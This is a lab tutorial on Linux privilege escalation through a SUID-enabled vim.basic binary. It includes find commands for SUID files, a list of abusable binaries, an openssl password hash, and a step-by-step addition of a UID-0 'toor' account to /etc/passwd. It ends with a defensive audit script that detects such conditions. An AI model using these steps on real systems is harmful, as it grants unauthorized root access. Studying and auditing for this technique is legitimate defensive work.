Using a SUID vim.basic binary to achieve privilege escalation on Linux

Reproduce on Kali

First, set the SUID bit on the vim.basic binary:

chmod u+s /usr/bin/vim.basic

Next, use adduser test1 to create an ordinary, unprivileged user.

The environment is now set up for the privilege escalation.

You can find files with the SUID bit set by using the following commands:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

The files that can be used to escalate privileges are

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

The idea behind using vim to elevate privileges is to modify the /etc/passwd file and add a user with root privileges for yourself.

The user format of the passwd file is: username:password:uid:gid:comment:home directory:user's shell

Here you can see the format of the root user

root:x:0:0:root:/root:/bin/bash

(The password part is x because the real password is stored in the /etc/shadow file)

Generate a password hash with openssl passwd -1 -salt asd 123 (the option is -1, the digit one, not the letter L).

Then write the new entry directly into the passwd file:

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

You can try to modify it with vim /etc/passwd, but on saving, error E212 appears and the file cannot be written, because the current user does not have permission to modify it.

Instead, open the file with the vim.basic binary found earlier. That program has the SUID bit set, so it can edit the file:

vim.basic /etc/passwd

Opened this way, the file can be modified and saved successfully.

You can see that the entry has been added. Switch users with su toor, password 123, and then check the permissions with id.

The result shows root permissions.
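
From the defender's side, both conditions this walkthrough depends on can be audited. The script below is an added example, not part of the original article: the function names flag_risky_suid, audit_passwd and demo are hypothetical, and the sample input in demo is constructed from the entries shown above.

```bash
#!/bin/sh
# Added example: audit for the two conditions the article relies on,
# a SUID bit on a binary from its list and a rogue entry in /etc/passwd.

# Read SUID file paths on stdin (for instance the output of
#   find / -perm -u=s -type f 2>/dev/null
# ) and print those whose file name is on the article's list.
flag_risky_suid() {
    while IFS= read -r path; do
        case "${path##*/}" in
            nmap|vim|vim.*|find|bash|more|less|nano|cp)
                printf 'RISKY_SUID %s\n' "$path" ;;
        esac
    done
}

# Inspect a passwd-format file (default /etc/passwd) and report:
#   UID0         an account other than root whose UID field is 0
#   INLINE_HASH  an account whose password field starts with "$", i.e. a
#                crypt hash stored in passwd itself instead of the x placeholder
audit_passwd() {
    awk -F: '
        $3 ~ /^0+$/ && $1 != "root" { print "UID0 " $1 }
        $2 ~ /^\$/                  { print "INLINE_HASH " $1 }
    ' "${1:-/etc/passwd}"
}

# Run both checks on constructed sample data (not taken from a real host).
demo() {
    sample=$(mktemp)
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'test1:x:1001:1001::/home/test1:/bin/bash' \
        'toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash' > "$sample"
    audit_passwd "$sample"
    printf '%s\n' /usr/bin/passwd /usr/bin/vim.basic | flag_risky_suid
    rm -f "$sample"
}
```

Any RISKY_SUID hit on an editor can be cleared with chmod u-s on that file, and any UID0 or INLINE_HASH line should be reviewed against known account changes.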
